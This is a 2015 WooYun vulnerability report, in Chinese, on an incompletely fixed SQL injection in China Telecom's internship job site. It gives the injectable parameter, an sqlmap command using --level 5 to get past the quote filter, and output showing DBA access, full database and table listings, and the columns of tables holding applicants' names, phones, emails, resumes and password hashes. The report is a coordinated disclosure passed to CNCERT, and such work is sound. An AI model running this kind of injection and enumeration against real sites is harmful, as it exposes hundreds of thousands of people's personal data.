中国电信之翼实习某处修复不完全仍可SQL注入（DBA权限+几十万用户泄漏+你的简历信息我知道）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144422

漏洞标题：中国电信之翼实习某处修复不完全仍可SQL注入（DBA权限+几十万用户泄漏+你的简历信息我知道）

漏洞作者：路人甲

提交时间：2015-10-01 19:07

修复时间：2015-11-24 17:06

公开时间：2015-11-24 17:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-01：细节已通知厂商并且等待厂商处理中
2015-10-10：厂商已经确认，细节仅向厂商公开
2015-10-20：细节向核心白帽子及相关领域专家公开
2015-10-30：细节向普通白帽子公开
2015-11-09：细节向实习白帽子公开
2015-11-24：细节向公众公开

简要描述：

以前测试过，在职位搜索的时候是可以注入的，即便修复，还是可以增加level获得注入，每天有提交，但是半年过去了，也修复好了，继续抓包寻找，发现了另一处注入。

详细说明：

抓包得到一个注入点如下：

http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1
id存在注入
http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1'
测试，返回错误结果
MySQL Error
Message: MySQL Query Error
SQL: select * from shixibao_uchome.mm_postclass_detail WHERE parent_id =1斜杠'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '斜杠'' at line 1
Errno.: 1064
Click here to seek help.

可以看出'被过滤成“斜杠'”了，但是过滤不严格，仍可导致注入，增加level等级后完全可以绕过过滤进行注入

未添加--level 5测试结果

添加--level 5测试结果

sqlmap.py -u "http://**.**.**.**/shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1" --threads 10 --dbms "MySQL" -p id --level 5 --current-db --current-user --is-dba --hostname

sqlmap构造注入参数进行测试

[16:29:08] [INFO] testing MySQL
[16:29:08] [INFO] confirming MySQL
[16:29:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.5.11, Apache 2.4.9
back-end DBMS: MySQL >= 5.0.0
[16:29:08] [INFO] fetching current user
current user:    'admin@%'
[16:29:08] [INFO] fetching current database
current database:    'shixibao_uchome'
[16:29:08] [INFO] fetching server hostname
hostname:    'WIN-9VCJIM9JGJ2'
[16:29:08] [INFO] testing if current user is DBA
[16:29:08] [INFO] fetching current user
current user is DBA:    True
[16:23:38] [INFO] testing MySQL
[16:23:38] [INFO] confirming MySQL
[16:23:38] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.5.11, Apache 2.4.9
back-end DBMS: MySQL >= 5.0.0
[16:23:38] [INFO] fetching database users
database management system users [8]:
[*] ''@'localhost'
[*] 'admin'@'%'
[*] 'admin'@'localhost'
[*] 'cem'@'%'
[*] 'pma'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'localhost'
available databases [16]:
[*] cdcol
[*] cem_db
[*] game
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] shixibao
[*] shixibao_uc
[*] shixibao_uchome
[*] shixibao_uchome_20140525
[*] test
[*] testmql
[*] ultrax
[*] webauth
[*] zhiweibeifen
Database: shixibao_uchome
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| mm_hgz_user                | 419959  |		用户
| uchome_spaceinfo           | 232626  |
| uchome_creditlog           | 77958   |
| mm_member_view             | 43670   |
| uchome_member              | 43670   |		成员
| uchome_space               | 39361   |
| uchome_spacefield          | 38057   |
| mm_usereduinfo             | 36957   |		用户教育信息
| mm_userresumeinfo          | 36957   |		用户简历信息
| mm_userbaseinfo            | 35948   |
| mm_userinfo                | 35948   |		用户信息
| mm_zhiweiapply_view        | 34043   |
| mm_zhiweiinfo              | 34043   |
| mm_zhiweiapply_view_1      | 33827   |
| mm_zhiwei_temp             | 33302   |
| mm_userinfo_zhiweiinfo_all | 32937   |
| uchome_notification        | 22243   |
| uchome_activity_notice     | 22100   |
| mm_mailqueue               | 21633   |
| mm_youngmembers            | 15836   |
| uchome_resume              | 13136   |
| mm_userskill_map           | 6584    |
| mm_department              | 5276    |
| mm_deptinfo                | 5240    |
| mm_delivery                | 4589    |
| mm_compus_posdeli_view     | 4184    |
| mm_useruniversmap          | 4157    |
| mm_userunivsmap_view       | 4157    |
| mm_personal_zhaopin        | 3627    |
| mm_young_tribe             | 3222    |
| mm_univs                   | 3209    |
| mm_user_upload             | 2874    |
| jobcollect                 | 2494    |
| mm_company_interest        | 2165    |
| uchome_usertask            | 1190    |
| mm_fam_enterprise          | 1100    |
| mm_company_visitor         | 865     |
| mm_enterprise_zhaopin      | 857     |
| uchome_comment             | 817     |
| uchome_member_third        | 732     |
| mm_post_recommend          | 728     |
| mm_zhiwei_questions        | 691     |
| mm_home_card               | 594     |
| mm_userreg_channel         | 559     |
| mm_follow                  | 510     |
| uchome_stat                | 502     |
| mm_zhiwei_send             | 428     |
| mm_city                    | 357     |
| uchome_friend              | 350     |
| uchome_coupon              | 300     |
| uchome_pic                 | 296     |
| uchome_visitor             | 225     |
| uchome_tagspace            | 221     |
| uchome_tagblog             | 217     |
| uchome_feed                | 203     |
| uchome_tag                 | 176     |
| mm_employinfo              | 174     |
| mm_employinfo_view         | 174     |
| mm_score_item              | 152     |
| mm_dept_location           | 147     |
| uchome_zan                 | 138     |
| uchome_blogfield           | 128     |
| mm_delivercont_view        | 123     |
| uchome_blog                | 122     |
| uchome_doing               | 117     |
| uchome_config              | 108     |
| mm_score_stat              | 106     |
| mm_lucky_log               | 98      |
| mm_score_mark              | 97      |
| mm_delivery_attach         | 94      |
| uchome_album               | 92      |
| mm_taskuser_map            | 89      |
| mm_score_marker            | 81      |
| mm_themes                  | 71      |
| mm_score_task              | 68      |
| uchome_post                | 66      |
| mm_usercode_map            | 52      |
| uchome_creditrule          | 47      |
| uchome_thread              | 44      |
| mm_zhiwei_replayments      | 43      |
| mm_grades_user             | 42      |
| mm_postclass_detail        | 38      |
| mm_provinces               | 34      |
| mm_score_template          | 34      |
| mm_interview_notice        | 26      |
| mm_video_course            | 25      |
| uchome_magic               | 25      |
| mm_young_report            | 24      |
| uchome_magicstore          | 24      |
| mm_score_eachsum           | 22      |
| mm_replayments             | 21      |
| mm_young_report_map        | 21      |
| mm_younger_gd_temp         | 20      |
| mm_taskcompany_map         | 18      |
| mm_attach_files            | 15      |
| mm_lucky_wall              | 15      |
| uchome_click               | 15      |
| mm_subscribe_job           | 14      |
| mm_audition_task           | 13      |
| mm_questions               | 13      |
| uchome_profield            | 13      |
| mm_postclass               | 12      |
| mm_questions_view          | 12      |
| mm_replayments_view        | 12      |
| mm_dynamic                 | 11      |
| uchome_event               | 11      |
| uchome_eventfield          | 11      |
| uchome_userevent           | 11      |
| mm_audition_user           | 10      |
| mm_mail_template           | 10      |
| mm_report                  | 10      |
| uchome_mtag                | 10      |
| mm_talent_pool             | 9       |
| uchome_poke                | 9       |
| uchome_usergroup           | 9       |
| uchome_data                | 8       |
| mm_jianzhi_delivery        | 7       |
| mm_sys_post                | 7       |
| mm_ztask_classify          | 7       |
| uchome_cron                | 7       |
| uchome_task                | 7       |
| uchome_eventclass          | 6       |
| uchome_job                 | 6       |
| uchome_spacelog            | 6       |
| mm_post_attachment         | 5       |
| mm_sys_picplay             | 5       |
| mm_video_wall              | 5       |
| uchome_class               | 5       |
| uchome_polloption          | 5       |
| mm_like                    | 4       |
| mm_video_score             | 4       |
| uchome_magicinlog          | 4       |
| mm_grades_enter            | 3       |
| uchome_picfield            | 3       |
| uchome_statuser            | 3       |
| uchome_usermagic           | 3       |
| mm_grade_template          | 2       |
| mm_task                    | 2       |
| uchome_eventpic            | 2       |
| uchome_mailqueue           | 2       |
| uchome_report              | 2       |
| mm_compus_news             | 1       |
| mm_score                   | 1       |
| mm_strategies              | 1       |
| mm_students_star           | 1       |
| mm_whos_online             | 1       |
| uchome_block               | 1       |
| uchome_home_card           | 1       |
| uchome_invite              | 1       |
| uchome_poll                | 1       |
| uchome_pollfield           | 1       |
| uchome_session             | 1       |
| uchome_show                | 1       |
+----------------------------+---------+
Database: shixibao
+-------------------------------------+---------+
| Table                               | Entries |
+-------------------------------------+---------+
| phome_ecms_zhiwei_crawl_copy        | 1382607 |
| phome_ecms_jianzhi_crawl            | 376758  |
| phome_ecms_zhiwei_crawl_copy_cl     | 114558  |
| phome_ecms_zhiwei_crawl             | 56813   |
| phome_ecms_zhiwei_crawl_sxs_copy    | 51662   |
| phome_ecms_zhiwei                   | 50579   |
| ecms_post_mapping                   | 34324   |
| mm_zhiweiapply_view                 | 34043   |
| phome_ecms_zhiwei_crawl_copy_backup | 19955   |
| phome_ecms_zhiwei_data_1            | 13547   |
| phome_ecms_zhiwei_index             | 13498   |
| phome_enewsdolog                    | 2519    |
| ecms_post_mapping_history           | 1907    |
| phome_ecms_zhiwei_crawl_test        | 1669    |
| phome_ecms_zhiwei_crawl_1           | 1245    |
| phome_ecms_zhiwei_crawl_sxs         | 1024    |
| phome_enewsdownerror                | 1008    |
| phome_enewssearch                   | 942     |
| phome_ecms_jianzhi_crawl_test       | 729     |
| phome_enewslog                      | 456     |
| yjsqzw                              | 385     |
| phome_enewsf                        | 199     |
| phome_enewsmemberadd                | 75      |
| phome_enewsmember                   | 73      |
| phome_enewstempbak                  | 61      |
| phome_enewsclass                    | 56      |
| phome_enewsclass_stats              | 56      |
| phome_enewsclassadd                 | 56      |
| phome_enewstempdt                   | 56      |
| phome_enewsdiggips                  | 52      |
| phome_ecms_info                     | 41      |
| phome_ecms_info_data_1              | 41      |
| phome_ecms_info_index               | 41      |
| phome_ecms_locationorder            | 34      |
| phome_ecms_news                     | 34      |
| phome_ecms_news_data_1              | 34      |
| phome_ecms_news_index               | 34      |
| phome_ecms_zhiwei_history           | 32      |
| phome_ecms_download                 | 24      |
| phome_ecms_download_data_1          | 24      |
| phome_ecms_download_index           | 24      |
| phome_ecms_movie                    | 24      |
| phome_ecms_movie_data_1             | 24      |
| phome_ecms_movie_index              | 24      |
| phome_ecms_shop                     | 24      |
| phome_ecms_shop_data_1              | 24      |
| phome_ecms_shop_index               | 24      |
| phome_enewsbq                       | 23      |
| phome_ecms_article                  | 18      |
| phome_ecms_article_data_1           | 18      |
| phome_ecms_article_index            | 18      |
| phome_enewsbqtemp                   | 17      |
| phome_enewslink                     | 14      |
| phome_enewslisttemp                 | 13      |
| phome_enewstable                    | 13      |
| phome_ecms_flash                    | 12      |
| phome_ecms_flash_data_1             | 12      |
| phome_ecms_flash_index              | 12      |
| phome_enewsmemberf                  | 12      |
| phome_enewsmod                      | 12      |
| phome_enewstempvar                  | 12      |
| phome_enewsnewstemp                 | 11      |
| phome_enewsfeedbackf                | 9       |
| phome_ecms_photo                    | 7       |
| phome_ecms_photo_data_1             | 7       |
| phome_ecms_photo_index              | 7       |
| phome_enewsshoppayfs                | 6       |
| phome_ecms_tongzhi                  | 5       |
| phome_ecms_tongzhi_data_1           | 5       |
| phome_ecms_tongzhi_index            | 5       |
| phome_enewsfile_1                   | 5       |
| phome_enewsnotcj                    | 5       |
| phome_enewsbqclass                  | 4       |
| phome_enewsfile_other               | 4       |
| phome_enewsmembergroup              | 4       |
| phome_enewsplayer                   | 4       |
| phome_enewsshopps                   | 4       |
| phome_enewsuser                     | 4       |
| phome_enewsuseradd                  | 4       |
| phome_enewsuserloginck              | 4       |
| phome_enewszt                       | 4       |
| phome_enewsztadd                    | 4       |
| phome_enewsclassnavcache            | 3       |
| phome_enewspage                     | 3       |
| phome_enewspayapi                   | 3       |
| phome_enewsadminstyle               | 2       |
| phome_enewsclasstemp                | 2       |
| phome_enewsgbook                    | 2       |
| phome_enewsmemberform               | 2       |
| phome_enewssearchtemp               | 2       |
| phome_enewsspacestyle               | 2       |
| phome_enewsvotetemp                 | 2       |
| phome_enewswapstyle                 | 2       |
| phome_ecms_infoclass_news           | 1       |
| phome_enewsadclass                  | 1       |
| phome_enewsclass_stats_set          | 1       |
| phome_enewsdo                       | 1       |
| phome_enewsfeedbackclass            | 1       |
| phome_enewsfile_member              | 1       |
| phome_enewsgbookclass               | 1       |
| phome_enewsgroup                    | 1       |
| phome_enewsindexpage                | 1       |
| phome_enewsinfoclass                | 1       |
| phome_enewsjstemp                   | 1       |
| phome_enewsloginfail                | 1       |
| phome_enewspageclass                | 1       |
| phome_enewspicclass                 | 1       |
| phome_enewspl_set                   | 1       |
| phome_enewspltemp                   | 1       |
| phome_enewspostserver               | 1       |
| phome_enewsprinttemp                | 1       |
| phome_enewspublic                   | 1       |
| phome_enewspublic_update            | 1       |
| phome_enewspubtemp                  | 1       |
| phome_enewsshop_set                 | 1       |
| phome_enewstempgroup                | 1       |
| phome_enewsuserlist                 | 1       |
| phome_enewsuserlistclass            | 1       |
| phome_enewsztclass                  | 1       |
+-------------------------------------+---------+
Database: shixibao_uc
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| uc_members          | 52392   |
| uc_memberfields     | 24057   |
| uc_comments         | 739     |
| uc_notelist         | 573     |
| uc_friends          | 144     |
| uc_pms              | 74      |
| uc_settings         | 27      |
| uc_newpm            | 14      |
| uc_applications     | 4       |
| uc_failedlogins     | 2       |
| uc_protectedmembers | 2       |
+---------------------+---------+
Database: shixibao_uchome_20140525
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| uchome_spaceinfo    | 9899    |
| uchome_feed         | 3915    |
| uchome_creditlog    | 2886    |
| uchome_space        | 1364    |
| uchome_spacefield   | 1343    |
| mm_member_view      | 1335    |
| uchome_member       | 1335    |
| uchome_resume       | 1057    |
| uchome_statuser     | 511     |
| uchome_visitor      | 119     |
| uchome_config       | 108     |
| uchome_usertask     | 77      |
| mm_department       | 75      |
| uchome_creditrule   | 47      |
| uchome_magic        | 25      |
| uchome_magicstore   | 24      |
| uchome_friend       | 16      |
| uchome_click        | 15      |
| uchome_stat         | 12      |
| uchome_usergroup    | 9       |
| mm_postclass        | 7       |
| uchome_data         | 7       |
| uchome_task         | 7       |
| uchome_eventclass   | 6       |
| uchome_job          | 6       |
| uchome_cron         | 5       |
| uchome_polloption   | 5       |
| uchome_notification | 4       |
| uchome_event        | 3       |
| uchome_eventfield   | 3       |
| uchome_profield     | 3       |
| uchome_userevent    | 3       |
| uchome_magicinlog   | 2       |
| uchome_usermagic    | 2       |
| mm_deptinfo         | 1       |
| uchome_mailcron     | 1       |
| uchome_mailqueue    | 1       |
| uchome_poll         | 1       |
| uchome_pollfield    | 1       |
+---------------------+---------+
Database: ultrax
+-----------------------------------+---------+
| Table                             | Entries |
+-----------------------------------+---------+
| pre_common_district               | 45051   |
| pre_common_setting                | 406     |
| pre_common_member                 | 138     |
| pre_common_member_count           | 125     |
| pre_common_member_field_forum     | 125     |
| pre_common_member_field_home      | 125     |
| pre_common_member_profile         | 125     |
| pre_common_member_status          | 125     |
| pre_common_block_style            | 103     |
| pre_common_syscache               | 103     |
| pre_common_smiley                 | 85      |
| pre_forum_statlog                 | 82      |
| pre_common_admincp_perm           | 67      |
| pre_common_member_profile_setting | 51      |
| pre_common_nav                    | 48      |
| pre_common_stylevar               | 45      |
| pre_forum_forumfield              | 37      |
| pre_forum_forum                   | 36      |
| pre_common_credit_rule            | 31      |
| pre_common_stat                   | 28      |
| pre_common_credit_rule_log        | 26      |
| pre_common_cron                   | 20      |
| pre_common_onlinetime             | 20      |
| pre_common_usergroup              | 20      |
| pre_common_usergroup_field        | 20      |
| pre_home_click                    | 15      |
| pre_common_plugin                 | 12      |
| pre_forum_medal                   | 10      |
| pre_common_admingroup             | 7       |
| pre_forum_typeoption              | 6       |
| pre_common_admincp_group          | 5       |
| pre_common_friendlink             | 5       |
| pre_forum_post                    | 5       |
| pre_forum_post_tableid            | 5       |
| pre_forum_bbcode                  | 4       |
| pre_forum_onlinelist              | 4       |
| pre_forum_thread                  | 4       |
| pre_forum_grouplevel              | 3       |
| pre_forum_imagetype               | 3       |
| pre_forum_sofa                    | 3       |
| pre_common_admincp_session        | 2       |
| pre_common_block                  | 2       |
| pre_common_failedlogin            | 2       |
| pre_common_statuser               | 2       |
| pre_common_template_block         | 2       |
| pre_common_word_type              | 2       |
| pre_forum_threadcalendar          | 2       |
| pre_forum_threadhot               | 2       |
| pre_mobile_setting                | 2       |
| pre_mobile_wsq_threadlist         | 2       |
| pre_common_diy_data               | 1       |
| pre_common_style                  | 1       |
| pre_common_template               | 1       |
| pre_forum_filter_post             | 1       |
| pre_forum_threadpartake           | 1       |
| pre_forum_threadprofile           | 1       |
| pre_home_favorite                 | 1       |
+-----------------------------------+---------+
Database: cem_db
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| cem_circuit_province_calc             | 1762584 |
| cem_circuit_province_quarter_calc     | 587528  |
| cem_kmeans_customer_calc              | 439524  |
| cem_sfactor_pro_customer_calc         | 424572  |
| cem_circuit_qoe                       | 266167  |
| cem_sfactor_all_customer_calc         | 188592  |
| data_original_maintain                | 161114  |
| cem_circuit_province_year_calc        | 146882  |
| cem_kmeans_customer_quarter_calc      | 146508  |
| cem_sfactor_pro_customer_quarter_calc | 141524  |
| cem_circuit_qoe_quarter               | 89263   |
| cem_circuit_calc                      | 88452   |
| cem_sfactor_all_customer_quarter_calc | 62864   |
| cem_maintain                          | 57285   |
| cem_kmeans_customer_year_calc         | 36627   |
| cem_sfactor_pro_customer_year_calc    | 35381   |
| cem_circuit_quarter_calc              | 29484   |
| data_original_trouble                 | 23296   |
| cem_circuit_qoe_year                  | 22924   |
| cem_sfactor_all_customer_year_calc    | 15716   |
| cem_customer_rate                     | 15305   |
| data_original_circuit                 | 12712   |
| cem_trouble                           | 12589   |
| numbers                               | 10000   |
| cem_circuit_info                      | 7371    |
| cem_circuit_year_calc                 | 7371    |
| cem_d_time                            | 4018    |
| data_original_kaitong                 | 909     |
| cem_kaitong                           | 830     |
| buffer_industry_rate                  | 645     |
| cem_busi_prefect_rate                 | 372     |
| cem_kmeans_province_calc              | 372     |
| cem_sfactor_province_calc             | 372     |
| cem_busi_prefect_rate_quarter         | 124     |
| cem_kmeans_province_quarter_calc      | 124     |
| cem_sfactor_province_quarter_calc     | 124     |
| buffer_customer_circuit               | 72      |
| cem_province                          | 38      |
| cem_busi_prefect_rate_year            | 31      |
| cem_kmeans_province_year_calc         | 31      |
| cem_sfactor_province_year_calc        | 31      |
| cem_user_customer_relation            | 23      |
| cem_customer                          | 22      |
| cem_customer_selected                 | 22      |
| cem_indicator                         | 16      |
| cem_industry                          | 10      |
| numbers_small                         | 10      |
| cem_indicator_expect                  | 8       |
| cem_indicator_threshold               | 8       |
| sys_user                              | 5       |
| sys_user_role                         | 5       |
| sys_role                              | 4       |
| cem_business                          | 3       |
| cem_data_file                         | 2       |
+---------------------------------------+---------+
Database: game
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| game_outwatch | 16      |
| game_admin    | 4       |
| game_node     | 4       |
| game_path_map | 3       |
| game_mobile   | 2       |
| game_path     | 2       |
+---------------+---------+

Database: shixibao_uchome
Table: mm_userinfo
[18 columns]
+------------+-----------------------+
| Column     | Type                  |
+------------+-----------------------+
| birthcity  | varchar(20)           |
| birthyear  | smallint(6) unsigned  |
| edu_degree | smallint(6)           |
| email      | varchar(100)          |
| endyear    | smallint(6) unsigned  |
| major      | varchar(255)          |
| mobile     | varchar(40)           |
| msn        | varchar(80)           |
| name       | char(20)              |
| qq         | varchar(20)           |
| residecity | varchar(20)           |
| resumename | varchar(100)          |
| resumeurl  | varchar(100)          |
| school     | text                  |
| sex        | tinyint(1)            |
| startyear  | smallint(6) unsigned  |
| uid        | mediumint(8) unsigned |
| username   | char(15)              |
+------------+-----------------------+
Database: shixibao_uchome
Table: uchome_member
[9 columns]
+-----------+-----------------------+
| Column    | Type                  |
+-----------+-----------------------+
| companyid | int(50)               |
| deptid    | int(20)               |
| hasresume | varchar(255)          |
| isactive  | tinyint(4)            |
| mail      | varchar(100)          |
| password  | char(32)              |
| type      | int(5)                |
| uid       | mediumint(8) unsigned |
| username  | char(200)             |
+-----------+-----------------------+
Database: shixibao_uchome
Table: mm_hgz_user
[18 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| address    | varchar(200) |
| birth      | varchar(200) |
| degree     | varchar(200) |
| education  | text         |
| email      | varchar(200) |
| evaluation | text         |
| height     | varchar(200) |
| hometown   | varchar(200) |
| id         | int(10)      |
| intend     | text         |
| mobile     | varchar(200) |
| name       | varchar(200) |
| nation     | varchar(200) |
| qq         | varchar(200) |
| sex        | varchar(200) |
| title      | varchar(200) |
| weight     | varchar(200) |
| zzmm       | varchar(200) |
+------------+--------------+
Database: shixibao_uchome
Table: mm_youngmembers
[16 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| age         | int(5)       |
| city        | varchar(100) |
| gender      | int(1)       |
| iskeyperson | int(1)       |
| mail        | varchar(200) |
| major       | varchar(64)  |
| name        | varchar(200) |
| phone       | varchar(50)  |
| school      | varchar(200) |
| schoolid    | int(11)      |
| status      | int(10)      |
| tribeid     | int(200)     |
| uid         | int(10)      |
| updatetime  | int(10)      |
| wechatId    | varchar(200) |
| yixinId     | varchar(200) |
+-------------+--------------+

只列出来一部分，其余的几十万用户就不继续了，还有几千万的数据也不分析了！~~~

漏洞证明：

修复方案：

继续过滤！~~~

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-10-10 17:05

厂商回复：

CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144422

漏洞标题：中国电信之翼实习某处修复不完全仍可SQL注入（DBA权限+几十万用户泄漏+你的简历信息我知道）

相关厂商：中国电信

漏洞作者：路人甲

提交时间：2015-10-01 19:07

修复时间：2015-11-24 17:06

公开时间：2015-11-24 17:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144422

漏洞标题：中国电信之翼实习某处修复不完全仍可SQL注入（DBA权限+几十万用户泄漏+你的简历信息我知道）

相关厂商：中国电信

漏洞作者： 路人甲

提交时间：2015-10-01 19:07

修复时间：2015-11-24 17:06

公开时间：2015-11-24 17:06

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0144422"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云